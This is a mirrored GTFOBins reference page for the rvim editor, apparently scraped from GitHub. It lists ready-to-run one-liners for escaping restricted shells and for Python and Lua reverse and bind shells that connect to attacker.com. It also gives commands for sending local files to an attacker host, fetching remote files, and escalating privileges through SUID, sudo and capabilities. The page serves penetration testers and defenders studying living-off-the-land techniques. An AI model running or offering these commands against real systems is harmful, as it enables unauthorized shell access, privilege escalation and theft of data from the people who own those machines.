1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-05-23 15:56:02 +02:00
GTFOBins.github.io/_gtfobins/rvim.md
2023-09-25 16:18:01 +02:00

6.3 KiB

functions
shell reverse-shell non-interactive-reverse-shell non-interactive-bind-shell file-upload file-download file-write file-read library-load suid sudo capabilities limited-suid
description code
This requires that `rvim` version is `< 9.0.1440`. rvim -c ':redir! > ~/.vimrc | echo "!python3 -c 'import pty; pty.spawn("/bin/bash")'" | redir END | set shell=/usr/bin/vim | diffpatch'
description code
This requires that `rvim` is compiled with Python support. Prepend `:py3` for Python 3. rvim -c ':py import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
description code
This requires that `rvim` is compiled with Lua support. rvim -c ':lua os.execute("reset; exec sh")'
description code
This requires that `rvim` is compiled with Python support. Prepend `:py3` for Python 3. Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell. export RHOST=attacker.com export RPORT=12345 rvim -c ':py import vim,sys,socket,os,pty;s=socket.socket() s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))) [os.dup2(s.fileno(),fd) for fd in (0,1,2)] pty.spawn("/bin/sh") vim.command(":q!")'
description code
Run ``nc -l -p 12345`` on the attacker box to receive the shell. This requires that `rvim` is compiled with Lua support and that `lua-socket` is installed. export RHOST=attacker.com export RPORT=12345 rvim -c ':lua local s=require("socket"); local t=assert(s.tcp()); t:connect(os.getenv("RHOST"),os.getenv("RPORT")); while true do local r,x=t:receive();local f=assert(io.popen(r,"r")); local b=assert(f:read("*a"));t:send(b); end; f:close();t:close();'
description code
Run `nc target.com 12345` on the attacker box to connect to the shell. This requires that `rvim` is compiled with Lua support and that `lua-socket` is installed. export LPORT=12345 rvim -c ':lua local k=require("socket"); local s=assert(k.bind("*",os.getenv("LPORT"))); local c=s:accept(); while true do local r,x=c:receive();local f=assert(io.popen(r,"r")); local b=assert(f:read("*a"));c:send(b); end;c:close();f:close();'
description code
This requires that `rvim` is compiled with Python support. Prepend `:py3` for Python 3. Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file. export URL=http://attacker.com/ export LFILE=file_to_send rvim -c ':py import vim,sys; from os import environ as e if sys.version_info.major == 3: import urllib.request as r, urllib.parse as u else: import urllib as u, urllib2 as r r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode())) vim.command(":q!")'
description code
This requires that `rvim` is compiled with Python support. Prepend `:py3` for Python 3. Serve files in the local folder running an HTTP server. export LPORT=8888 rvim -c ':py import vim,sys; from os import environ as e if sys.version_info.major == 3: import http.server as s, socketserver as ss else: import SimpleHTTPServer as s, SocketServer as ss ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever() vim.command(":q!")'
description code
Send a local file via TCP. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. This requires that `rvim` is compiled with Lua support and that `lua-socket` is installed. export RHOST=attacker.com export RPORT=12345 export LFILE=file_to_send rvim -c ':lua local f=io.open(os.getenv("LFILE"), 'rb') local d=f:read("*a") io.close(f); local s=require("socket"); local t=assert(s.tcp()); t:connect(os.getenv("RHOST"),os.getenv("RPORT")); t:send(d); t:close();'
description code
This requires that `rvim` is compiled with Python support. Prepend `:py3` for Python 3. Fetch a remote file via HTTP GET request. export URL=http://attacker.com/file_to_get export LFILE=file_to_save rvim -c ':py import vim,sys; from os import environ as e if sys.version_info.major == 3: import urllib.request as r else: import urllib as r r.urlretrieve(e["URL"], e["LFILE"]) vim.command(":q!")'
description code
Fetch a remote file via TCP. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file. This requires that `rvim` is compiled with Lua support and that `lua-socket` is installed. export LPORT=12345 export LFILE=file_to_save rvim -c ':lua local k=require("socket"); local s=assert(k.bind("*",os.getenv("LPORT"))); local c=s:accept(); local d,x=c:receive("*a"); c:close(); local f=io.open(os.getenv("LFILE"), "wb"); f:write(d); io.close(f);'
code
rvim file_to_write iDATA ^[ w
code
rvim file_to_read
description code
This requires that `rvim` is compiled with Python support. Prepend `:py3` for Python 3. rvim -c ':py import vim; from ctypes import cdll; cdll.LoadLibrary("lib.so"); vim.command(":q!")'
description code
This requires that `rvim` is compiled with Python support. Prepend `:py3` for Python 3. ./rvim -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'
description code
This requires that `rvim` is compiled with Python support. Prepend `:py3` for Python 3. sudo rvim -c ':py import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
description code
This requires that `rvim` is compiled with Lua support. sudo rvim -c ':lua os.execute("reset; exec sh")'
description code
This requires that `rvim` is compiled with Python support. Prepend `:py3` for Python 3. ./rvim -c ':py import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
description code
This requires that `rvim` is compiled with Lua support. ./rvim -c ':lua os.execute("reset; exec sh")'